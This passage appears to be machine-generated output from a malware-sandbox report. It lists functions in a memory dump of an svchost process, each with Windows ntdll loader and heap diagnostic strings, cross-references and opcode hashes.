                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 4c1d2e7a04ecdc933ddece91727a85b4a9a4d1d6c9c034d6b9cce3b8d80b486e
                                          • Instruction ID: b68c1c0c0f3db365c919d15d3854d37e81bf53d2ce74437a05d76ae26da3ccad
                                          • Opcode Fuzzy Hash: 4c1d2e7a04ecdc933ddece91727a85b4a9a4d1d6c9c034d6b9cce3b8d80b486e
                                          • Instruction Fuzzy Hash: 73915A30B007149BDB35EF19ED95BAEBBA4EF41764F18812DE4106B381DBB45C01CBA4
                                          Function 03662674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 036A2180
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 036A2178
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 036A219F
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 036A21BF
                                          • RtlGetAssemblyStorageRoot, xrefs: 036A2160, 036A219A, 036A21BA
                                          • SXS: %s() passed the empty activation context, xrefs: 036A2165
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 027ae63fec5a9fd33bf3da33435b057ce54c82c6edc4417136aa55880b35f0c9
                                          • Instruction ID: e1286b9a273467c86b25e2f7ae68a3f042581395811c0b9c48785418b40d85a3
                                          • Opcode Fuzzy Hash: 027ae63fec5a9fd33bf3da33435b057ce54c82c6edc4417136aa55880b35f0c9
                                          • Instruction Fuzzy Hash: AD312836F802147BE721CA998C65F5FBF78DB95A80F094469FA14AB241D670DE01CBE1
                                          Function 0366C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpInitializeImportRedirection, xrefs: 036A8177, 036A81EB
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 036A8181, 036A81F5
                                          • minkernel\ntdll\ldrinit.c, xrefs: 0366C6C3
                                          • LdrpInitializeProcess, xrefs: 0366C6C4
                                          • Loading import redirection DLL: '%wZ', xrefs: 036A8170
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 036A81E5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 7c478064954e2fd938fb7687bcf39ede4813842984e735763f085e740b15f587
                                          • Instruction ID: db67810cf4b8358810ca9bed863b29687789e513dc508bfa31e1f72894f933af
                                          • Opcode Fuzzy Hash: 7c478064954e2fd938fb7687bcf39ede4813842984e735763f085e740b15f587
                                          • Instruction Fuzzy Hash: AC310775744B459FD224EF28DD45E2ABBE4EF84B10F04056CF885AF391E660EC04CBA6
                                          Function 036B9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                          • API String ID: 0-3127649145
                                          • Opcode ID: f7528f36ef7996882a49b42605aec02799ccd89ba4be9cfd92f541c982d7d6a3
                                          • Instruction ID: 079f7b02c40717dd82f2f37a86bfded669839cbded2cc0aa82200cc3b98ade23
                                          • Opcode Fuzzy Hash: f7528f36ef7996882a49b42605aec02799ccd89ba4be9cfd92f541c982d7d6a3
                                          • Instruction Fuzzy Hash: 50325675A017199BDB21DF65CD88BDAB7F8FF48304F1041EAE509AB250EB70AA84CF54
                                          Function 03649950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                          • API String ID: 0-3393094623
                                          • Opcode ID: 4df38a12d84b5784f3ae92eada6a23063a2eb516cbd90a3db17ff7bf2ce9e9f6
                                          • Instruction ID: b4bbb8a3345e8df193a233aff2847d6fbb3dccb76847ee3e3fdb4cc015cfd3f5
                                          • Opcode Fuzzy Hash: 4df38a12d84b5784f3ae92eada6a23063a2eb516cbd90a3db17ff7bf2ce9e9f6
                                          • Instruction Fuzzy Hash: E80247759483418BD720CF64C184BABFBE9BF8A704F48895EE9998B350E770D845CB92
                                          Function 036551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                          Download Yara Rule
                                          Strings
                                          • Kernel-MUI-Number-Allowed, xrefs: 03655247
                                          • Kernel-MUI-Language-Allowed, xrefs: 0365527B
                                          • WindowsExcludedProcs, xrefs: 0365522A
                                          • Kernel-MUI-Language-Disallowed, xrefs: 03655352
                                          • Kernel-MUI-Language-SKU, xrefs: 0365542B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: db691c9df998bc7dca5f14913f6d83fd39be106608a56654a86aac575ff5a186
                                          • Instruction ID: 2e24198e7618d9fd888421c9e0721b4db3869862d1ff53ce57264453007a6ab2
                                          • Opcode Fuzzy Hash: db691c9df998bc7dca5f14913f6d83fd39be106608a56654a86aac575ff5a186
                                          • Instruction Fuzzy Hash: D8F15E76D10218EFCF15DFA4C944AEEBBBDEF49610F54406AEA02AB350E7709E01CB90
                                          Function 036B4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                          • API String ID: 0-2518169356
                                          • Opcode ID: d19f665de6145a23464f17b97a3df762c7a734309cf6e7456998d0b1962578c8
                                          • Instruction ID: faa293ad065d6e7de36ca2f0e14ba8532ee0e66932fe4de1b3f16d417c6be6df
                                          • Opcode Fuzzy Hash: d19f665de6145a23464f17b97a3df762c7a734309cf6e7456998d0b1962578c8
                                          • Instruction Fuzzy Hash: 2191CE72D006199BCB21CFA9C981AFEB7B4EF89310F594169E912EB350D735D981CF90
                                          Function 0365D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1975516107
                                          • Opcode ID: e9bce0ca7d71ad87aa926909e0c09ac35583136da5c8a7dd21dab9b7836afb74
                                          • Instruction ID: 00efb9c74984a7da902590043fdc1eb3fbf7d88aa40c5547363a3a4106228ecf
                                          • Opcode Fuzzy Hash: e9bce0ca7d71ad87aa926909e0c09ac35583136da5c8a7dd21dab9b7836afb74
                                          • Instruction Fuzzy Hash: C451CC75E00345DFDB24EFA4C5847ADBBB1BF49318F288169E801AB3D1D778A981CB80
                                          Function 036276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          • Opcode ID: 390661258646eeb5ce7db219dbb8f14cffbec3184d563b1540ed82491d4826c0
                                          • Instruction ID: 0332578842834aaf90e002846663bdabf86e8451aa4e08cc4e6a64e8a71b8f3b
                                          • Opcode Fuzzy Hash: 390661258646eeb5ce7db219dbb8f14cffbec3184d563b1540ed82491d4826c0
                                          • Instruction Fuzzy Hash: 28012836648A60DED229F319D40EF57BBD4DB47A70F19404DE0104F692CAE49880C928
                                          Function 036470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 3fd0cfbd61013f7919ead066e3533beb73be444fa71dbf6bd8aaf22eecdd1f7a
                                          • Instruction ID: 8010ee9bfdacfffd91313a7cd346c0c7c5e4772cfe80c8784da66ebd3cb2a17f
                                          • Opcode Fuzzy Hash: 3fd0cfbd61013f7919ead066e3533beb73be444fa71dbf6bd8aaf22eecdd1f7a
                                          • Instruction Fuzzy Hash: 6F139A70E00655DFDB29CF68C9807AAFBF1BF49304F1881A9D859AB381D735A946CF90
                                          Function 03641070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-3570731704
                                          • Opcode ID: 3b3422b8ad626369b6065282067b3dbf932e79d6d1411e3bdd2ca28759595f88
                                          • Instruction ID: 207d8bdc2e9b9ac840d5169847e68bee684e19f89c6b0ba403329769e768eb60
                                          • Opcode Fuzzy Hash: 3b3422b8ad626369b6065282067b3dbf932e79d6d1411e3bdd2ca28759595f88
                                          • Instruction Fuzzy Hash: C4925775E00268CFEB25CF18C940BA9B7B9BF46314F0981EAD94AAB350D7749E81CF15
                                          Function 0364A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03697D39
                                          • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03697D56
                                          • SsHd, xrefs: 0364A885
                                          • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03697D03
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                          • API String ID: 0-2905229100
                                          • Opcode ID: 704b97210f796c4f7b329dfb576abca5c39fa37ad633598925c68217e32c54c6
                                          • Instruction ID: c7a2d3143bf4a17592fb71fa2447cf15ff0a1dbaead91b037836ee3d31c60cfb
                                          • Opcode Fuzzy Hash: 704b97210f796c4f7b329dfb576abca5c39fa37ad633598925c68217e32c54c6
                                          • Instruction Fuzzy Hash: 2ED17A35E50219AFDF24CFA8C980AADF7B5FF48310F19416AE845AB351D771E981CBA0
                                          Function 03643D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: c911a3fe964cba207369e77acec52996926706a5d937dba918cbb5ac7797f165
                                          • Instruction ID: 1d1a713801701c58b7fb724b231d1dd4a520da7f9ed6cb0412308eb216dc7ddf
                                          • Opcode Fuzzy Hash: c911a3fe964cba207369e77acec52996926706a5d937dba918cbb5ac7797f165
                                          • Instruction Fuzzy Hash: B9E2BF74E006158FDB29CF69C591BAAFBF1FF49304F188199D849AB385DB34A846CF90
                                          Function 0363A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: fc053538af66c696dd4f307808f14be0ec8fefc8c59e7ac7b50d88d981995292
                                          • Instruction ID: a74868723c90a63a18362ad2b71d5765b5d400c7e71879abf08eced96c4aa607
                                          • Opcode Fuzzy Hash: fc053538af66c696dd4f307808f14be0ec8fefc8c59e7ac7b50d88d981995292
                                          • Instruction Fuzzy Hash: 25C18774508386DFDB10CF98C144B6AB7E8BF86704F04896AF8D68B351E334C94ADB66
                                          Function 03640C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                          Download Yara Rule
                                          Strings
                                          • HEAP: , xrefs: 036954E0, 036955A1
                                          • HEAP[%wZ]: , xrefs: 036954D1, 03695592
                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 036954ED
                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 036955AE
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                          • API String ID: 0-1657114761
                                          • Opcode ID: 7f96ca36c8a509b0e9a803b4fbb077a9f73c1c66a7e328f4b82a1918980512f6
                                          • Instruction ID: a117a49997abac40d68902d0d6b1d5ca18416cb40009dac25e4bbfbc41b1a832
                                          • Opcode Fuzzy Hash: 7f96ca36c8a509b0e9a803b4fbb077a9f73c1c66a7e328f4b82a1918980512f6
                                          • Instruction Fuzzy Hash: 81A1F134A04625DFDB24DF28C940BBAFBE5EF46300F18856ED6968B782D774A845CB90
                                          Function 0366273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 036A21D9, 036A22B1
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 036A22B6
                                          • SXS: %s() passed the empty activation context, xrefs: 036A21DE
                                          • .Local, xrefs: 036628D8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 51a3dceae6a4addfc07953bcc29b0a7d2fa2f15504eaaeb80e2fcacf3d540e5c
                                          • Instruction ID: 905c521ab44aaf4e7a28f89affa1539bfd952b7c7fe505270f7eeb2590cbdd8d
                                          • Opcode Fuzzy Hash: 51a3dceae6a4addfc07953bcc29b0a7d2fa2f15504eaaeb80e2fcacf3d540e5c
                                          • Instruction Fuzzy Hash: 5CA1C135940229DFCB24CF69CD98BA9B3B4BF58354F1849E9D848AB351D7309E81CF94
                                          Function 0362F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
                                          • Opcode ID: 8ded01df173ea63816c809eff459c024424e26014d3d46bcb10b88773a3aa357
                                          • Instruction ID: e59a4751c5b4f8068db8e06b5ea877ea1a48c0706b3d4060e7ba87b01280271c
                                          • Opcode Fuzzy Hash: 8ded01df173ea63816c809eff459c024424e26014d3d46bcb10b88773a3aa357
                                          • Instruction Fuzzy Hash: F7612436205B809FD721EB24CA44F67BBE8EF84714F190968F9558F391C735D845CB62
                                          Function 036E11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 0-336120773
                                          • Opcode ID: 8e80f84559d280d86fca47a56a57caccf083d2d216aaa051492063be2cb6ea9b
                                          • Instruction ID: 426c4992b92e84d5824b540b06da6231e40f444e516b3efabb0d2fdf3307024e
                                          • Opcode Fuzzy Hash: 8e80f84559d280d86fca47a56a57caccf083d2d216aaa051492063be2cb6ea9b
                                          • Instruction Fuzzy Hash: B5310E35601610EFC711DBA8CC86F6BB7E8EF0B620F190049E412CF291D670ED88EA6D
                                          Function 03629148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                          • API String ID: 0-1391187441
                                          • Opcode ID: 6ea158822dcd103d89b9f5788b4ca83e562cda54d17e514fd659861d64eab67e
                                          • Instruction ID: 27b0681d14de7ffb4b75c89c2ab5c4fb49db492c8740b71d886c934b95bbfd05
                                          • Opcode Fuzzy Hash: 6ea158822dcd103d89b9f5788b4ca83e562cda54d17e514fd659861d64eab67e
                                          • Instruction Fuzzy Hash: 9531A236A00614AFCB11EB46C889F9EBFF8EF45B20F154165E915AB291D7B0E940CE64
                                          Function 036429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                          Download Yara Rule
                                          Strings
                                          • HEAP: , xrefs: 03643264
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0364327D
                                          • HEAP[%wZ]: , xrefs: 03643255
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          • Opcode ID: 5ee53b4f3f707573a1824395466f2a37f8394fd89810dd3af2c55cb56377896e
                                          • Instruction ID: e551bf6252910c8f41355ebfbe537fcdedde3e79d5fb30c6ea545229045044a0
                                          • Opcode Fuzzy Hash: 5ee53b4f3f707573a1824395466f2a37f8394fd89810dd3af2c55cb56377896e
                                          • Instruction Fuzzy Hash: A392CB74E042489FDB25CF68C5547AEBBF1FF09300F2884A9E899AB391D735A942CF50
                                          Function 03641F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: c4b8e071f2789d9a866296d6b8c3eea2ab42ccf0cbd210145798dd9cb28b4b13
                                          • Instruction ID: 2b87858562040dfd1f8efb95449a41afca5c3133cba8ea5a978de2e7be60714c
                                          • Opcode Fuzzy Hash: c4b8e071f2789d9a866296d6b8c3eea2ab42ccf0cbd210145798dd9cb28b4b13
                                          • Instruction Fuzzy Hash: F622EC70A007019FEB16DF28C594B7AFBF9EF06704F28849AE5568B382D771D882CB50
                                          Function 03640770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: c1320e1edd664823f12b0afff66126897848364d4b19cc6c3f51724909ef3457
                                          • Instruction ID: 14a6f40c8041341f98794048de3da69845a80a78d8b27170264774c1cda76ffc
                                          • Opcode Fuzzy Hash: c1320e1edd664823f12b0afff66126897848364d4b19cc6c3f51724909ef3457
                                          • Instruction Fuzzy Hash: 07F1BD34B00615DFEB15CF68CA94B6AF7B9FF45304F1881A9E6169B381D734E982CB90
                                          Function 03631460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                          Download Yara Rule
                                          Strings
                                          • HEAP: , xrefs: 03631596
                                          • HEAP[%wZ]: , xrefs: 03631712
                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03631728
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: d5381806d43d19562c1d1c57f69b291ed02a2a2518e180126918b30916624762
                                          • Instruction ID: 734c78e95ef54f98aa5f9b9c68c791cf17a07c7ee95aeb692af50f1e7bf25f1e
                                          • Opcode Fuzzy Hash: d5381806d43d19562c1d1c57f69b291ed02a2a2518e180126918b30916624762
                                          • Instruction Fuzzy Hash: 08E11F70A046419FDB28EF68C485BBABBF5EF4B310F18855DE4968B342E734E941CB60
                                          Function 0363B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                          • API String ID: 0-1145731471
                                          • Opcode ID: 962f23e4631cf13195801c3874ea54efabf73ca1a309c03576b347be8fa62831
                                          • Instruction ID: 4d3635842fa835983afbde0054c7871ca6b72992b32a5e3b0982e684ff6a2a74
                                          • Opcode Fuzzy Hash: 962f23e4631cf13195801c3874ea54efabf73ca1a309c03576b347be8fa62831
                                          • Instruction Fuzzy Hash: 33B17D79A046049BDF25CF69CA80BAEB7BAFF45714F28456AE451EB380D730E841CB54
                                          Function 03656962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $@
                                          • API String ID: 0-1077428164
                                          • Opcode ID: 6eaac94c2d86865941c000d8e2cf0fb9b7a610240f0be2dc341e524717fb7e0f
                                          • Instruction ID: 67d83b3aafe9440b28b48d9e8b053f5d2580256cd11e85f7bc82b7c2f3cab76b
                                          • Opcode Fuzzy Hash: 6eaac94c2d86865941c000d8e2cf0fb9b7a610240f0be2dc341e524717fb7e0f
                                          • Instruction Fuzzy Hash: 63C26F716083419FEB25CF24C981BABBBE9AF88754F08896EF989C7340D734D805CB52
                                          Function 0362A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 44640b5790a54bcd1a445ac6e01eeda066765daef696c89f33b6bf6c1cfdeedd
